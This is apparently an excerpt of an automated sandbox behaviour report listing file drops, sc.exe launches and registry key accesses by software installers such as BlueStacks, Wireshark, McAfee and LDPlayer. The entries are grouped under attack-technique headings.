| File created | C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\private\DropShadowBase.qml | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe | N/A |
| File created | C:\Program Files\Wireshark\Wireshark User's Guide\images\ws-bytes-pane-tabs.png | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-oem-ss-toast-variants-it-IT.js | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\HD-DataManager.exe.config | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\msvcp100.dll | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe | N/A |
| File created | C:\Program Files\Wireshark\zstd.dll | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\BstkDD.dll | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-dialog-balloon.css | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
| File created | C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\te.pak | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File created | C:\Program Files\ldplayer9box\VBoxSampleDevice.dll | F:\LDPlayer\LDPlayer9\dnrepairer.exe | N/A |
| File created | C:\Program Files\Wireshark\radius\dictionary.dlink | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-pscore-toast-da-DK.js | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\INF\c_fsopenfilebackup.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\wsdprint.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_camera.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fscfsmetadataserver.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fssecurityenhancer.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_computeaccelerator.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fscompression.PNF | C:\Windows\system32\mmc.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\INF\c_mcx.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_monitor.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fsactivitymonitor.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_linedisplay.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_swcomponent.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fsinfrastructure.PNF | C:\Windows\system32\mmc.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\SysWOW64\dism.exe | N/A |
| File created | C:\Windows\INF\remoteposdrv.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_media.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fsvirtualization.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\Installer\e66ab34.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\INF\c_display.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\oposdrv.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\miradisp.PNF | C:\Windows\system32\mmc.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\INF\c_fssystem.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\oem0.PNF | C:\Program Files\ldplayer9box\NetLwfUninstall.exe | N/A |
| File created | C:\Windows\INF\oem1.PNF | C:\Program Files\ldplayer9box\NetLwfUninstall.exe | N/A |
| File created | C:\Windows\INF\rdcameradriver.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAC64.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\INF\c_magneticstripereader.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_processor.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_volume.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\ts_generic.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_barcodescanner.PNF | C:\Windows\system32\mmc.exe | N/A |
| File opened for modification | C:\Windows\Installer\e66ab1f.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIB139.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\INF\digitalmediadevice.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fsreplication.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_netdriver.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_holographic.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\Installer\e66ab1f.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\INF\c_smrvolume.PNF | C:\Windows\system32\mmc.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\INF\c_fsencryption.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\xusb22.PNF | C:\Windows\system32\mmc.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| File created | C:\Windows\INF\c_cashdrawer.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fsquotamgmt.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fscopyprotection.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fsantivirus.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_receiptprinter.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_ucm.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\oem2.PNF | C:\Program Files\ldplayer9box\NetLwfUninstall.exe | N/A |
| File opened for modification | C:\Windows\Installer\e66ab0c.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\INF\c_fssystemrecovery.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_fscontentscreener.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_scmdisk.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\Installer\e66ab1e.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\INF\c_fscontinuousbackup.PNF | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\INF\c_firmware.PNF | C:\Windows\system32\mmc.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | N/A | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\mmc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\Control | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\mmc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ | C:\Windows\system32\mmc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Windows\system32\mmc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\mmc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\mmc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Windows\system32\mmc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\system32\mmc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\mmc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\mmc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\mmc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Windows\system32\mmc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Control | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\mmc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\system32\mmc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Program Files\Npcap\NPFInstall.exe | N/A |
